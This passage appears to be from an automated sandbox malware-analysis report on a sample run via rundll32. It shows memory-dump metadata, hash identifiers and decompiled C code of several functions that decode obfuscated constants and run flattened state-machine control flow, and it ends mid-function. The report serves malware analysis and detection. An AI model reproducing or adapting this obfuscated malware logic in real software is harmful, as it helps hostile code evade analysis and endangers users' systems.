                                                                                                                      0x006924e6
                                                                                                                      0x00000000
                                                                                                                      0x006924e6
                                                                                                                      0x0069245c
                                                                                                                      0x0069245c
                                                                                                                      0x0069245e
                                                                                                                      0x00692478
                                                                                                                      0x0069247c
                                                                                                                      0x00692480
                                                                                                                      0x00692484
                                                                                                                      0x00692499
                                                                                                                      0x0069249a
                                                                                                                      0x0069249f
                                                                                                                      0x006924a2
                                                                                                                      0x006924a7
                                                                                                                      0x006924ab
                                                                                                                      0x006924ac
                                                                                                                      0x00000000
                                                                                                                      0x00692460
                                                                                                                      0x00692460
                                                                                                                      0x00692466
                                                                                                                      0x00000000
                                                                                                                      0x0069246c
                                                                                                                      0x0069246c
                                                                                                                      0x00692471
                                                                                                                      0x00000000
                                                                                                                      0x00692471
                                                                                                                      0x00692466
                                                                                                                      0x0069245e
                                                                                                                      0x00000000
                                                                                                                      0x006924f5
                                                                                                                      0x006924f5
                                                                                                                      0x006924f5
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /"$>6:$Z*>$u=@
                                                                                                                      • API String ID: 0-89199335
                                                                                                                      • Opcode ID: abd72c4b7881ebedb01ff99783ff842820e80987bc29643770483e7829a650ab
                                                                                                                      • Instruction ID: 1baa8cb4c2e55b3b8ccf48b75849ee696763cd8ab396ecdda56ec65025c5cda6
                                                                                                                      • Opcode Fuzzy Hash: abd72c4b7881ebedb01ff99783ff842820e80987bc29643770483e7829a650ab
                                                                                                                      • Instruction Fuzzy Hash: C9B111711083819FC758CF65C49A81BFBE6FBD4748F209A1DF6A286261D3B5C949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00685548 Relevance: 5.2, Strings: 4, Instructions: 233COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00685548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v24;
				char _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* __ecx;
				void* _t190;
				void* _t206;
				void* _t208;
				signed int _t209;
				char* _t211;
				signed int _t212;
				intOrPtr _t222;
				intOrPtr* _t225;
				void* _t227;
				char* _t229;
				char _t233;
				intOrPtr _t255;
				intOrPtr* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int* _t263;

				_t225 = _a16;
				_t257 = _a4;
				_push(_t225);
				_push(_a12);
				_push(_a8);
				_push(_t257);
				_push(__edx);
				E006920B9(_t190);
				_v56 = 0xb9e7cb;
				_t255 = 0;
				_v52 = 0x6e87b5;
				_t263 =  &(( &_v148)[6]);
				_v48 = 0;
				_v44 = 0;
				_t227 = 0x3ccc1e9;
				_v128 = 0x85629b;
				_t258 = 0x62;
				_v128 = _v128 * 0x5a;
				_v128 = _v128 + 0xfbaf;
				_v128 = _v128 ^ 0x2ee5a62d;
				_v144 = 0xfc0c7f;
				_v144 = _v144 ^ 0xfdfaf442;
				_v144 = _v144 >> 1;
				_v144 = _v144 | 0x14143ad1;
				_v144 = _v144 ^ 0x7e977ecf;
				_v96 = 0xd1f565;
				_v96 = _v96 * 0x21;
				_v96 = _v96 ^ 0x1b12de47;
				_v104 = 0xb219e8;
				_v104 = _v104 | 0x75a31cc8;
				_v104 = _v104 ^ 0x75be6df4;
				_v80 = 0x6fb9b6;
				_v80 = _v80 * 0x3e;
				_v80 = _v80 ^ 0x1b001c4a;
				_v132 = 0x1154a0;
				_v132 = _v132 << 0xb;
				_v132 = _v132 + 0xfffffde8;
				_v132 = _v132 | 0xd1d436bb;
				_v132 = _v132 ^ 0xdbfeae5a;
				_v76 = 0x5374cd;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x0147cb67;
				_v140 = 0x35e68a;
				_v140 = _v140 + 0xffff467d;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x566bba39;
				_v140 = _v140 ^ 0x4faa8078;
				_v124 = 0xf91357;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xf2e4;
				_v124 = _v124 ^ 0x89afe8a4;
				_v112 = 0xf055e4;
				_v112 = _v112 ^ 0x101963ca;
				_v112 = _v112 | 0x7be8ad21;
				_v112 = _v112 ^ 0x7be17431;
				_v84 = 0x17393b;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x05c81c43;
				_v120 = 0xf688ab;
				_v120 = _v120 / _t258;
				_v120 = _v120 * 0x2d;
				_v120 = _v120 ^ 0x00718a36;
				_v116 = 0xa21f51;
				_v116 = _v116 + 0x3c3b;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0006c391;
				_v88 = 0x51e239;
				_v88 = _v88 + 0x2ec0;
				_v88 = _v88 ^ 0x0058dd2b;
				_v136 = 0xa92d92;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0647b396;
				_v136 = _v136 ^ 0x20b7ff2f;
				_v136 = _v136 ^ 0x26fd7475;
				_v108 = 0xb50576;
				_t259 = 0x45;
				_v108 = _v108 / _t259;
				_v108 = _v108 ^ 0xb94dc178;
				_v108 = _v108 ^ 0xb943792d;
				_v148 = 0xb9b260;
				_t260 = 0x14;
				_v148 = _v148 / _t260;
				_v148 = _v148 * 0x3f;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x009e914b;
				_v92 = 0x6e7d65;
				_v92 = _v92 | 0xb573042f;
				_v92 = _v92 ^ 0xb570b7bc;
				_v100 = 0xfd8f7e;
				_v100 = _v100 * 0x5d;
				_v100 = _v100 ^ 0x5c1db3f3;
				L1:
				while(_t227 != 0x3c16ad4) {
					if(_t227 == 0x3ccc1e9) {
						_t227 = 0x7dbf5b4;
						continue;
					}
					if(_t227 == 0x79abc1a) {
						_t229 =  &_v28;
						_t208 = E0068AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
						_t263 =  &(_t263[4]);
						if(_t208 != 0) {
							_push(_t229);
							_push(_t229);
							_t222 = E00687FF2(_v24);
							 *_t257 = _t222;
							if(_t222 != 0) {
								E0068ED7E(_v108,  *_t257, _v148, _v28, _v24);
								_t263 =  &(_t263[3]);
								 *((intOrPtr*)(_t257 + 4)) = _v24;
								_t255 = 1;
							}
						}
						_t227 = 0xdaef9d5;
						continue;
					}
					if(_t227 == 0x7dbf5b4) {
						_t209 =  *((intOrPtr*)(_t225 + 4));
						_t233 =  *_t225;
						_v68 = _t209;
						_v72 = _t233;
						_t211 = _t209 - 1 + _t233;
						while(_t211 > _t233) {
							if( *_t211 == 0) {
								break;
							}
							_t211 = _t211 - 1;
						}
						_t212 = _t211 - _t233;
						_v68 = _t212;
						if(_t212 == 0) {
							L16:
							_t227 = 0xfc35b14;
							continue;
						}
						while(_v68 % _v144 != _v128) {
							_t163 =  &_v68;
							 *_t163 = _v68 - 1;
							if( *_t163 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t227 == 0xdaef9d5) {
						E00698519(_v92, _v100, _v64);
						L28:
						return _t255;
					}
					if(_t227 != 0xfc35b14) {
						L25:
						if(_t227 != 0xb843ed5) {
							continue;
						}
						goto L28;
					}
					if(E00685E60( &_v72, _v96, _v104,  &_v64) == 0) {
						goto L28;
					}
					_t227 = 0x3c16ad4;
				}
				_t206 = E00688B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
				_t263 =  &(_t263[4]);
				if(_t206 == 0) {
					_t227 = 0xdaef9d5;
					goto L25;
				}
				_t227 = 0x79abc1a;
				goto L1;
			}



















































                                                                                                                      0x0068554f
                                                                                                                      0x00685558
                                                                                                                      0x00685560
                                                                                                                      0x00685561
                                                                                                                      0x00685568
                                                                                                                      0x0068556f
                                                                                                                      0x00685570
                                                                                                                      0x00685572
                                                                                                                      0x00685577
                                                                                                                      0x00685582
                                                                                                                      0x00685584
                                                                                                                      0x0068558f
                                                                                                                      0x00685592
                                                                                                                      0x00685598
                                                                                                                      0x0068559c
                                                                                                                      0x006855a1
                                                                                                                      0x006855b0
                                                                                                                      0x006855b1
                                                                                                                      0x006855b5
                                                                                                                      0x006855bd
                                                                                                                      0x006855c5
                                                                                                                      0x006855cd
                                                                                                                      0x006855d5
                                                                                                                      0x006855d9
                                                                                                                      0x006855e1
                                                                                                                      0x006855e9
                                                                                                                      0x006855f6
                                                                                                                      0x006855fa
                                                                                                                      0x00685602
                                                                                                                      0x0068560a
                                                                                                                      0x00685612
                                                                                                                      0x0068561a
                                                                                                                      0x00685627
                                                                                                                      0x0068562b
                                                                                                                      0x00685633
                                                                                                                      0x0068563b
                                                                                                                      0x00685640
                                                                                                                      0x00685648
                                                                                                                      0x00685650
                                                                                                                      0x00685658
                                                                                                                      0x00685660
                                                                                                                      0x00685665
                                                                                                                      0x0068566d
                                                                                                                      0x00685675
                                                                                                                      0x00685682
                                                                                                                      0x00685686
                                                                                                                      0x0068568e
                                                                                                                      0x00685696
                                                                                                                      0x0068569e
                                                                                                                      0x006856a3
                                                                                                                      0x006856ab
                                                                                                                      0x006856b3
                                                                                                                      0x006856bb
                                                                                                                      0x006856c3
                                                                                                                      0x006856cb
                                                                                                                      0x006856d3
                                                                                                                      0x006856db
                                                                                                                      0x006856e0
                                                                                                                      0x006856e8
                                                                                                                      0x006856f6
                                                                                                                      0x006856ff
                                                                                                                      0x00685703
                                                                                                                      0x0068570b
                                                                                                                      0x00685713
                                                                                                                      0x0068571b
                                                                                                                      0x00685720
                                                                                                                      0x00685728
                                                                                                                      0x00685730
                                                                                                                      0x0068573a
                                                                                                                      0x00685742
                                                                                                                      0x0068574a
                                                                                                                      0x0068574f
                                                                                                                      0x00685757
                                                                                                                      0x0068575f
                                                                                                                      0x00685767
                                                                                                                      0x00685775
                                                                                                                      0x0068577a
                                                                                                                      0x00685780
                                                                                                                      0x00685788
                                                                                                                      0x00685790
                                                                                                                      0x0068579c
                                                                                                                      0x006857a4
                                                                                                                      0x006857ad
                                                                                                                      0x006857b1
                                                                                                                      0x006857b6
                                                                                                                      0x006857be
                                                                                                                      0x006857c6
                                                                                                                      0x006857ce
                                                                                                                      0x006857d6
                                                                                                                      0x006857e3
                                                                                                                      0x006857e7
                                                                                                                      0x00000000
                                                                                                                      0x006857ef
                                                                                                                      0x00685801
                                                                                                                      0x0068591d
                                                                                                                      0x00000000
                                                                                                                      0x0068591d
                                                                                                                      0x0068580d
                                                                                                                      0x006858ac
                                                                                                                      0x006858bb
                                                                                                                      0x006858c0
                                                                                                                      0x006858c5
                                                                                                                      0x006858da
                                                                                                                      0x006858db
                                                                                                                      0x006858dc
                                                                                                                      0x006858e1
                                                                                                                      0x006858e7
                                                                                                                      0x00685901
                                                                                                                      0x0068590f
                                                                                                                      0x00685912
                                                                                                                      0x00685915
                                                                                                                      0x00685915
                                                                                                                      0x006858e7
                                                                                                                      0x00685916
                                                                                                                      0x00000000
                                                                                                                      0x00685916
                                                                                                                      0x00685819
                                                                                                                      0x00685856
                                                                                                                      0x00685859
                                                                                                                      0x0068585b
                                                                                                                      0x00685860
                                                                                                                      0x00685864
                                                                                                                      0x0068586e
                                                                                                                      0x0068586b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068586d
                                                                                                                      0x0068586d
                                                                                                                      0x00685872
                                                                                                                      0x00685874
                                                                                                                      0x00685878
                                                                                                                      0x00685892
                                                                                                                      0x00685892
                                                                                                                      0x00000000
                                                                                                                      0x00685892
                                                                                                                      0x0068587a
                                                                                                                      0x0068588c
                                                                                                                      0x0068588c
                                                                                                                      0x00685890
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00685890
                                                                                                                      0x00000000
                                                                                                                      0x0068587a
                                                                                                                      0x0068581d
                                                                                                                      0x00685975
                                                                                                                      0x0068597b
                                                                                                                      0x00685987
                                                                                                                      0x00685987
                                                                                                                      0x00685829
                                                                                                                      0x0068595b
                                                                                                                      0x00685961
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00685967
                                                                                                                      0x00685849
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068584f
                                                                                                                      0x0068584f
                                                                                                                      0x00685943
                                                                                                                      0x00685948
                                                                                                                      0x0068594d
                                                                                                                      0x00685959
                                                                                                                      0x00000000
                                                                                                                      0x00685959
                                                                                                                      0x0068594f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1t{$9Q$;<$e}n
                                                                                                                      • API String ID: 0-2095593254
                                                                                                                      • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                      • Instruction ID: 7189868d253b7993f477663ae0310a897bbdcc25118f985a2c2d4ee2137c1a09
                                                                                                                      • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                      • Instruction Fuzzy Hash: 19B141B1108381DFC768DF22C58595BBBF2FBC4748F508A1DF69696260D7B18A4ACF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00697DD5 Relevance: 5.2, Strings: 4, Instructions: 226COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00697DD5() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				intOrPtr _t236;
				void* _t241;
				short* _t244;
				void* _t247;
				void* _t250;
				intOrPtr _t256;
				intOrPtr _t272;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int* _t283;

				_t283 =  &_v1156;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t250 = 0x1242b9;
				_v1056 = 0xc74a30;
				_v1052 = 0xdc93e6;
				_v1140 = 0x94ae82;
				_v1140 = _v1140 * 0x5d;
				_v1140 = _v1140 | 0xd08f5b59;
				_t278 = 0x3b;
				_v1140 = _v1140 / _t278;
				_v1140 = _v1140 ^ 0x042b78b4;
				_v1060 = 0xf2c7d8;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x000b32e4;
				_v1084 = 0xadf7c1;
				_v1084 = _v1084 >> 7;
				_v1084 = _v1084 ^ 0x0005ae79;
				_v1068 = 0x4ca2f2;
				_v1068 = _v1068 | 0x7f3e9315;
				_v1068 = _v1068 ^ 0x7f77e091;
				_v1148 = 0xfaa01c;
				_v1148 = _v1148 | 0x0a84fcb5;
				_t279 = 0x3d;
				_v1148 = _v1148 / _t279;
				_v1148 = _v1148 + 0xffff92ee;
				_v1148 = _v1148 ^ 0x0020489e;
				_v1104 = 0xbd50a4;
				_v1104 = _v1104 | 0x802f8c80;
				_v1104 = _v1104 ^ 0xe2a4d8db;
				_v1104 = _v1104 ^ 0x621899e9;
				_v1096 = 0x4ec4a;
				_t280 = 0x27;
				_v1096 = _v1096 / _t280;
				_v1096 = _v1096 ^ 0x000ca7f0;
				_v1156 = 0x496e13;
				_v1156 = _v1156 << 0xb;
				_v1156 = _v1156 + 0xffff34c4;
				_v1156 = _v1156 ^ 0xea67072b;
				_v1156 = _v1156 ^ 0xa10c07e0;
				_v1132 = 0x5417d7;
				_v1132 = _v1132 ^ 0x2d0a29d3;
				_v1132 = _v1132 * 0x11;
				_v1132 = _v1132 ^ 0x95d68b4c;
				_v1132 = _v1132 ^ 0x969bce68;
				_v1108 = 0x3d434d;
				_t83 =  &_v1108; // 0x3d434d
				_v1108 =  *_t83 * 0x5d;
				_v1108 = _v1108 + 0xbd1d;
				_v1108 = _v1108 ^ 0x16426462;
				_v1064 = 0x905f90;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x482aff2b;
				_v1076 = 0xa70fe8;
				_v1076 = _v1076 ^ 0x0f6696b3;
				_v1076 = _v1076 ^ 0x0fce7292;
				_v1144 = 0x5add64;
				_v1144 = _v1144 * 0x72;
				_v1144 = _v1144 >> 2;
				_v1144 = _v1144 + 0xffffbbe0;
				_v1144 = _v1144 ^ 0x0a105df6;
				_v1112 = 0xa934e1;
				_v1112 = _v1112 + 0xffff3dc6;
				_v1112 = _v1112 ^ 0xf71e7087;
				_v1112 = _v1112 ^ 0xf7bbdd65;
				_v1152 = 0xfe7bab;
				_v1152 = _v1152 + 0xffffe121;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 + 0xffffae88;
				_v1152 = _v1152 ^ 0x7f211c18;
				_v1092 = 0x242707;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x0003c6d8;
				_v1136 = 0xebac4f;
				_v1136 = _v1136 + 0x4c15;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0xdf38e0e8;
				_v1136 = _v1136 ^ 0xdf3b1dfc;
				_v1120 = 0x4eb7ab;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 + 0xffff85cc;
				_v1120 = _v1120 ^ 0x01347c50;
				_v1088 = 0xc2f923;
				_v1088 = _v1088 * 0xf;
				_v1088 = _v1088 ^ 0x0b6c1f22;
				_v1080 = 0xbf02c1;
				_v1080 = _v1080 + 0xffffcd4c;
				_v1080 = _v1080 ^ 0x00bd8b7d;
				_v1128 = 0xfef10;
				_v1128 = _v1128 + 0xfa25;
				_v1128 = _v1128 + 0xffffb342;
				_v1128 = _v1128 + 0x2fe7;
				_v1128 = _v1128 ^ 0x00107547;
				_v1116 = 0x30091d;
				_v1116 = _v1116 | 0x682f5e67;
				_v1116 = _v1116 * 0xf;
				_v1116 = _v1116 ^ 0x1bb1960a;
				_v1100 = 0xdd7fbe;
				_v1100 = _v1100 >> 0xf;
				_v1100 = _v1100 + 0xffff26d4;
				_v1100 = _v1100 ^ 0xfff0a895;
				_v1072 = 0xd8d782;
				_v1072 = _v1072 + 0xffff857d;
				_v1072 = _v1072 ^ 0x00daabd2;
				_v1124 = 0x615b7c;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 * 0x3d;
				_v1124 = _v1124 ^ 0x000147a1;
				L1:
				while(_t250 != 0x1242b9) {
					if(_t250 == 0x56337fc) {
						E00696C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
						_push(_v1088);
						_push( &_v520);
						_push(_v1120);
						E006A13AD(_v1136,  &_v1040, __eflags);
						_t283 =  &(_t283[6]);
						_t250 = 0x8d6676f;
						continue;
					}
					if(_t250 == 0x5f94146) {
						_push(_v1148);
						_push(_v1068);
						_t241 = E0069DCF7(_v1084, 0x681000, __eflags);
						_t256 =  *0x6a3e10; // 0x0
						_t272 =  *0x6a3e10; // 0x0
						E006847CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
						E0068A8B0(_v1064, _t241, _v1076);
						_t283 =  &(_t283[9]);
						_t250 = 0x56337fc;
						continue;
					}
					if(_t250 == 0x8d6676f) {
						_t244 = E0068B6CF( &_v1040, _v1080, _v1128, _v1116);
						__eflags = 0;
						 *_t244 = 0;
						return E0068B1C6( &_v1040, _v1100, _v1072, _v1124);
					}
					if(_t250 == 0xbcbde3e) {
						_t247 = E0069473C();
						L8:
						_t250 = 0x5f94146;
						continue;
					}
					if(_t250 != 0xf4317dc) {
						L15:
						__eflags = _t250 - 0xfb0317f;
						if(__eflags != 0) {
							continue;
						}
						return _t247;
					}
					_t247 = E00683E3F();
					goto L8;
				}
				_t236 =  *0x6a3e10; // 0x0
				__eflags =  *((intOrPtr*)(_t236 + 0x450));
				if(__eflags == 0) {
					_t250 = 0xf4317dc;
					goto L15;
				}
				_t250 = 0xbcbde3e;
				goto L1;
			}













































                                                                                                                      0x00697dd5
                                                                                                                      0x00697ddb
                                                                                                                      0x00697de2
                                                                                                                      0x00697de7
                                                                                                                      0x00697dec
                                                                                                                      0x00697df4
                                                                                                                      0x00697dfc
                                                                                                                      0x00697e0d
                                                                                                                      0x00697e11
                                                                                                                      0x00697e1f
                                                                                                                      0x00697e24
                                                                                                                      0x00697e2a
                                                                                                                      0x00697e32
                                                                                                                      0x00697e3a
                                                                                                                      0x00697e3f
                                                                                                                      0x00697e47
                                                                                                                      0x00697e4f
                                                                                                                      0x00697e54
                                                                                                                      0x00697e5c
                                                                                                                      0x00697e64
                                                                                                                      0x00697e6c
                                                                                                                      0x00697e74
                                                                                                                      0x00697e7c
                                                                                                                      0x00697e88
                                                                                                                      0x00697e8d
                                                                                                                      0x00697e93
                                                                                                                      0x00697e9b
                                                                                                                      0x00697ea3
                                                                                                                      0x00697eab
                                                                                                                      0x00697eb3
                                                                                                                      0x00697ebb
                                                                                                                      0x00697ec3
                                                                                                                      0x00697ecf
                                                                                                                      0x00697ed2
                                                                                                                      0x00697ed6
                                                                                                                      0x00697ede
                                                                                                                      0x00697ee6
                                                                                                                      0x00697eeb
                                                                                                                      0x00697ef3
                                                                                                                      0x00697efb
                                                                                                                      0x00697f03
                                                                                                                      0x00697f0b
                                                                                                                      0x00697f18
                                                                                                                      0x00697f1c
                                                                                                                      0x00697f24
                                                                                                                      0x00697f2c
                                                                                                                      0x00697f34
                                                                                                                      0x00697f39
                                                                                                                      0x00697f3d
                                                                                                                      0x00697f45
                                                                                                                      0x00697f4d
                                                                                                                      0x00697f55
                                                                                                                      0x00697f5a
                                                                                                                      0x00697f62
                                                                                                                      0x00697f6a
                                                                                                                      0x00697f72
                                                                                                                      0x00697f7a
                                                                                                                      0x00697f87
                                                                                                                      0x00697f8b
                                                                                                                      0x00697f90
                                                                                                                      0x00697f98
                                                                                                                      0x00697fa0
                                                                                                                      0x00697fa8
                                                                                                                      0x00697fb0
                                                                                                                      0x00697fbd
                                                                                                                      0x00697fca
                                                                                                                      0x00697fd7
                                                                                                                      0x00697fdf
                                                                                                                      0x00697fe4
                                                                                                                      0x00697fec
                                                                                                                      0x00697ff4
                                                                                                                      0x00697ffc
                                                                                                                      0x00698001
                                                                                                                      0x00698009
                                                                                                                      0x00698011
                                                                                                                      0x00698019
                                                                                                                      0x0069801e
                                                                                                                      0x00698026
                                                                                                                      0x0069802e
                                                                                                                      0x00698036
                                                                                                                      0x0069803b
                                                                                                                      0x00698043
                                                                                                                      0x0069804b
                                                                                                                      0x00698058
                                                                                                                      0x0069805c
                                                                                                                      0x00698064
                                                                                                                      0x0069806c
                                                                                                                      0x00698074
                                                                                                                      0x0069807c
                                                                                                                      0x00698084
                                                                                                                      0x0069808c
                                                                                                                      0x00698094
                                                                                                                      0x0069809c
                                                                                                                      0x006980a4
                                                                                                                      0x006980ac
                                                                                                                      0x006980b9
                                                                                                                      0x006980bd
                                                                                                                      0x006980c5
                                                                                                                      0x006980cd
                                                                                                                      0x006980d2
                                                                                                                      0x006980da
                                                                                                                      0x006980e2
                                                                                                                      0x006980ea
                                                                                                                      0x006980f2
                                                                                                                      0x006980fa
                                                                                                                      0x00698102
                                                                                                                      0x0069810c
                                                                                                                      0x00698110
                                                                                                                      0x00000000
                                                                                                                      0x00698118
                                                                                                                      0x0069812a
                                                                                                                      0x006981f0
                                                                                                                      0x006981f5
                                                                                                                      0x00698200
                                                                                                                      0x00698201
                                                                                                                      0x00698210
                                                                                                                      0x00698215
                                                                                                                      0x00698218
                                                                                                                      0x00000000
                                                                                                                      0x00698218
                                                                                                                      0x00698132
                                                                                                                      0x00698164
                                                                                                                      0x0069816d
                                                                                                                      0x00698175
                                                                                                                      0x00698186
                                                                                                                      0x0069819e
                                                                                                                      0x006981b1
                                                                                                                      0x006981c6
                                                                                                                      0x006981cb
                                                                                                                      0x006981ce
                                                                                                                      0x00000000
                                                                                                                      0x006981ce
                                                                                                                      0x0069813a
                                                                                                                      0x0069825a
                                                                                                                      0x00698263
                                                                                                                      0x0069826d
                                                                                                                      0x00000000
                                                                                                                      0x0069827c
                                                                                                                      0x00698142
                                                                                                                      0x0069815d
                                                                                                                      0x00698155
                                                                                                                      0x00698155
                                                                                                                      0x00000000
                                                                                                                      0x00698155
                                                                                                                      0x00698146
                                                                                                                      0x00698239
                                                                                                                      0x00698239
                                                                                                                      0x0069823f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069823f
                                                                                                                      0x00698150
                                                                                                                      0x00000000
                                                                                                                      0x00698150
                                                                                                                      0x00698222
                                                                                                                      0x00698227
                                                                                                                      0x0069822e
                                                                                                                      0x00698237
                                                                                                                      0x00000000
                                                                                                                      0x00698237
                                                                                                                      0x00698230
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MC=$g^/h$|[a$/
                                                                                                                      • API String ID: 0-1545830693
                                                                                                                      • Opcode ID: b234ee5da1c8b38fee3ec954610a30d80f700f425b499e4d0a08c02b86015b35
                                                                                                                      • Instruction ID: cd96da83b5c7c0bc5e2abe99fa3b699bb78e85dc29955a0350d78515446a26dc
                                                                                                                      • Opcode Fuzzy Hash: b234ee5da1c8b38fee3ec954610a30d80f700f425b499e4d0a08c02b86015b35
                                                                                                                      • Instruction Fuzzy Hash: C8C110B11083818FC7A8DF25C48A41BFBE2FBC1758F508A1DF19296260D7B58A0ACF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069A2E8 Relevance: 5.2, Strings: 4, Instructions: 201COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0069A2E8(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t184;
				intOrPtr* _t189;
				intOrPtr _t193;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int* _t231;

				_t198 = __ecx;
				_t231 =  &_v92;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0x24c7b9;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x498f7200;
				_v76 = 0x5897f7;
				_v76 = _v76 + 0xffffedf4;
				_v76 = _v76 << 0xf;
				_v76 = _v76 + 0x73e5;
				_v76 = _v76 ^ 0x42f7f56f;
				_v52 = 0x46ab19;
				_v52 = _v52 << 0xd;
				_t228 = 0xe611c04;
				_v20 = _v20 & 0x00000000;
				_t223 = 0x66;
				_v52 = _v52 / _t223;
				_v52 = _v52 ^ 0x0211beab;
				_v80 = 0x97c948;
